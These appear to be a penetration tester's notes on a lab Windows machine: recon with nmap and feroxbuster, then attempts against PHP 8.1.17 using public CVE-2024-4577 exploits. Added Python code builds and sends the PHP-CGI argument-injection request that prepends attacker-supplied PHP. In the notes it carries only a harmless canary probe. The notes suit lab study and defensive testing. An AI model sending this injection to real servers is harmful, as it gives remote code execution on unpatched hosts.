# TAKEAWAYS

- xxx

---

# BLUF

- xxx

---

# Discover Ports & Services

- `ping` test

![[images/Pasted image 20260401144758.png]]

- Windows, based on the TTL (a reply TTL of 128 is the Windows default; Linux uses 64)
- `nmap` scan - light

![[images/Pasted image 20260401144904.png]]

- `nmap` scan - detailed

![[images/Pasted image 20260401145416.png]]

- `nmap` scan - UDP

![[images/Pasted image 20260401145804.png]]

---

# Service Enum

## Port 80 (HTTP): Apache 2.4.56; PHP 8.1.17

## Initial review

- Visit page

![[images/Pasted image 20260401145035.png]]

- Not much to see here
- View source

![[images/Pasted image 20260401151031.png]]

- Request/response in `burp`

![[images/Pasted image 20260401151149.png]]

- A few names on the page (potential usernames)

![[images/Pasted image 20260401145214.png]]

- File upload button may work? > asks for a video file (compatible with Windows Media Player)

![[images/Pasted image 20260401145200.png]]

## Web fuzzing

- Try `feroxbuster`
- `feroxbuster` uses `raft-medium-directories` by default, but this can be changed with `-w`
- This is a lot of output

```bash
feroxbuster -u http://10.129.13.168
```

![[images/Pasted image 20260401150050.png]]

- Directory fuzzing
	- `raft-medium`

![[images/Pasted image 20260401150339.png]]

	- `assets` has directory listing enabled and shows all the images > nothing useful

![[images/Pasted image 20260401150713.png]]

	- `2.3-medium` > nothing new

![[images/Pasted image 20260401150920.png]]

- Subdomain fuzzing
	- `top1million-20000` > nothing

![[images/Pasted image 20260401151513.png]]

- VHost fuzzing
	- `top1million-20000`

## Other Checks

- Try `index.html` > default 404
- Try `index.php` > drops us to the home page
- Try a random page > default 404

![[images/Pasted image 20260401150529.png]]

- No `robots.txt` and no `sitemap.xml`
- `whatweb` scan

![[images/Pasted image 20260401151410.png]]

- `searchsploit` for the Apache and PHP versions
	- nothing for `apache` 2.4.56
	- php 8.1.17 may have an exploit?
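The `index.html` / `index.php` / random-page checks above are the manual form of soft-404 triage: baseline what "not found" looks like on this server, then compare every candidate path against that baseline and against the home page. The script below is an added example, not part of these notes or of any tool they use; the `fake_fetch` fixture is constructed to mirror what was observed on port 80 (default 404 for unknown paths, `index.php` rewriting to the home page, a listable `assets/`), and the host `10.129.13.168` is taken from the notes. Swap in `live_fetch` to run it against a real target.

```python
"""Soft-404 triage: classify candidate paths against a random-path 404 baseline."""
from __future__ import annotations

import secrets
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Iterable


@dataclass
class Response:
    status: int
    body: str


Fetcher = Callable[[str], Response]


def live_fetch(url: str, timeout: float = 10) -> Response:
    """Minimal urllib fetcher that returns error pages instead of raising."""
    req = urllib.request.Request(url, headers={"User-Agent": "recon-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return Response(r.status, r.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:
        return Response(e.code, e.read().decode(errors="replace"))


def classify_paths(fetch: Fetcher, base: str, paths: Iterable[str], tolerance: int = 64) -> Dict[str, str]:
    """Classify each path against a fresh random-path 404 and the home page.

    `tolerance` absorbs small body-length differences (some default error
    pages echo the requested URL), so a 404 with a slightly different length
    is still treated as the baseline rather than as an interesting hit.
    """
    base = base.rstrip("/")
    not_found = fetch(f"{base}/{secrets.token_hex(8)}")  # baseline for "really not there"
    home = fetch(f"{base}/")
    verdicts: Dict[str, str] = {}
    for p in paths:
        r = fetch(f"{base}/{p.lstrip('/')}")
        if r.status == not_found.status and abs(len(r.body) - len(not_found.body)) <= tolerance:
            verdicts[p] = "404 baseline"
        elif r.status == home.status and r.body == home.body:
            verdicts[p] = "home page"  # e.g. index.php rewritten to /
        else:
            verdicts[p] = f"interesting: {r.status} ({len(r.body)} bytes)"
    return verdicts


# Constructed offline fixture (not captured traffic) mirroring the notes' observations.
_FAKE_SITE = {
    "/": Response(200, "<html>home</html>"),
    "/index.php": Response(200, "<html>home</html>"),
    "/assets/": Response(200, "<html>Index of /assets ...</html>"),
}


def fake_fetch(url: str) -> Response:
    """Offline fetcher: unknown paths get a constant default 404 page."""
    path = url.split("10.129.13.168", 1)[1] or "/"
    return _FAKE_SITE.get(path, Response(404, "<h1>Not Found</h1>"))


if __name__ == "__main__":
    candidates = ["index.html", "index.php", "robots.txt", "sitemap.xml", "assets/"]
    for path, verdict in classify_paths(fake_fetch, "http://10.129.13.168", candidates).items():
        print(f"{path:12} {verdict}")
```

Anything labelled `interesting` is what deserves a manual look; `home page` hits usually mean a rewrite or a catch-all front controller rather than a real file, which is worth knowing before trusting fuzzer output on the same host.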
![[images/Pasted image 20260401151856.png]]

## PHP 8.1.17

- Review `php/webapps/52047.py`
- Associated with `CVE-2024-4577` (PHP-CGI argument injection on Windows; fixed in 8.1.29 / 8.2.20 / 8.3.8)

![[images/Pasted image 20260401152205.png]]

- Takes URL and command arguments
- Getting errors

![[images/Pasted image 20260401153057.png]]

- Try a different command > returns the home page

```bash
python3 52047.py http://10.129.13.168 dir
```

![[images/Pasted image 20260401153839.png]]

- Try https://github.com/watchtowrlabs/CVE-2024-4577
- Getting errors regarding the command

```bash
python exploit.py --target http://10.129.13.168/index.php -c "<?php system('calc');?>"
```

## File Upload

---

# Privesc

- xxx
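For the CVE-2024-4577 attempts in the PHP 8.1.17 section above: both PoCs send the same published request shape, so when a script errors out it is worth reproducing that request by hand and checking for execution with a canary rather than reading a 200 with the normal home page as success. The code below is an added example, not part of these notes, of exploit-db 52047, or of the watchTowr PoC. It assumes the target script path (`/index.php`, from the notes) and that PHP runs through `php-cgi` on Windows; the vulnerability also needs a system code page whose best-fit mapping turns the soft hyphen (0xAD) into `-` (Windows code pages 932/936/950, the default for Japanese and Chinese locales), so a matching version alone does not make a host exploitable.

```python
"""Build and verify the published CVE-2024-4577 request shape (PHP-CGI on Windows)."""
from __future__ import annotations

import secrets
import urllib.request
from typing import Tuple
from urllib.parse import urlsplit, urlunsplit

# php-cgi rejects a query string that begins with "-" so it cannot be passed
# as a command-line option. On Windows with a best-fit code page, 0xAD (soft
# hyphen) is mapped to "-" after that check, so "%ADd" becomes "-d".
# -d allow_url_include=1 -d auto_prepend_file=php://input makes php-cgi
# evaluate the POST body before the requested script.
INJECTED_QUERY = "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"


def build_request(target_url: str, php_code: str) -> dict:
    """Return url/headers/body for a POST carrying `php_code` against `target_url`."""
    parts = urlsplit(target_url)
    url = urlunsplit((parts.scheme, parts.netloc, parts.path or "/", INJECTED_QUERY, ""))
    return {
        "url": url,
        "headers": {"Content-Type": "application/x-www-form-urlencoded"},
        "body": php_code.encode(),
    }


def build_probe(target_url: str) -> Tuple[dict, str]:
    """Build a harmless probe and return (request, expected_marker).

    The body asks PHP to echo the *reversed* canary. A server that merely
    reflects the request body (or an error page that echoes input) shows the
    forward canary, not the reversed one, so only real evaluation matches.
    """
    canary = "cve4577-" + secrets.token_hex(8)
    request = build_request(target_url, f'<?php echo strrev("{canary}"); ?>')
    return request, canary[::-1]


def executed(response_body: str, expected: str) -> bool:
    """True only if the prepended PHP actually ran."""
    return expected in response_body


def send_probe(target_url: str, timeout: float = 10) -> Tuple[bool, str]:
    """Send the probe (network) and report whether the injection executed."""
    request, expected = build_probe(target_url)
    req = urllib.request.Request(request["url"], data=request["body"],
                                 headers=request["headers"], method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as r:
        body = r.read().decode(errors="replace")
    return executed(body, expected), body


if __name__ == "__main__":
    req, marker = build_probe("http://10.129.13.168/index.php")  # host from the notes
    print("POST", req["url"])
    print(req["body"].decode())
    print("expect in response:", marker)
```

If the response is just the ordinary home page with no marker, the prepend did not execute: the request reached a PHP that is not running as CGI, or the host's code page does not best-fit 0xAD to `-`. Only then is it worth trying the CGI binary path directly (on XAMPP the default alias is `/php-cgi/php-cgi.exe`; whether this target exposes it is an assumption, not something the notes establish).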